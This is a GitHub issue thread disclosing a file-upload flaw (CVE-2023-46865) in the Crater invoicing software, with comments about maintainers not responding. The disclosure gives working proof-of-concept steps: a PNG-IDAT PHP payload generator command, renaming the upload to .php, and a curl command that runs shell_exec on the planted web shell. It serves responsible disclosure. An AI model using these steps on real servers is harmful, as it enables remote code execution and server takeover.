Open asylumdx opened 8 months ago
@asylumdx have they still not responded!? Thanks for raising this. that being said the software appears to be abandonware, since the promise of security maintenance is not being upheld.
have you tried emailing them, in case you haven't here are the instructions: https://github.com/crater-invoice/crater/security/policy
@rihards-simanovics I have reached out to them in discord in april and they responded then. Im sure they are aware of it by now.
@mohitpanjwani please review.
This vulnerability has been assigned CVE-2023-46865, credit to my colleagues at NetbyteSEC for helping with the exploit.
Description This is a responsible disclosure. I've contacted the maintainers through huntr.dev on april and they have acknowledged the vulnerability but the project seems to be in maintanance for almost a year. I've given them 5 months to fix(they didnt respond after acknowledging it) and think I should let others be aware of this,
Describe the bug In latest or 6.0.6 version of crater, superadmin is able to upload PHP file instead of an image using the Company Logo upload feature. The Base64Mime.php checking function can be bypassed by embedding a valid PHP payload into an IDAT image chunk. I have used https://github.com/huntergregal/PNG-IDAT-Payload-Generator for the poc.
python3 .\generate.py -m php -o test.png
Then use superadmin account to upload, change .png to .php in Burp .
Then
curl -XPOST -d '1=uname -a' 'http://localhost/storage/1/test.php?0=shell_exec' --output o && cat o
Expected behavior Php file shouldnt be allowed to be uploaded. A whitelisting of extension should be used to prevent execution of php files.
Please complete the following information: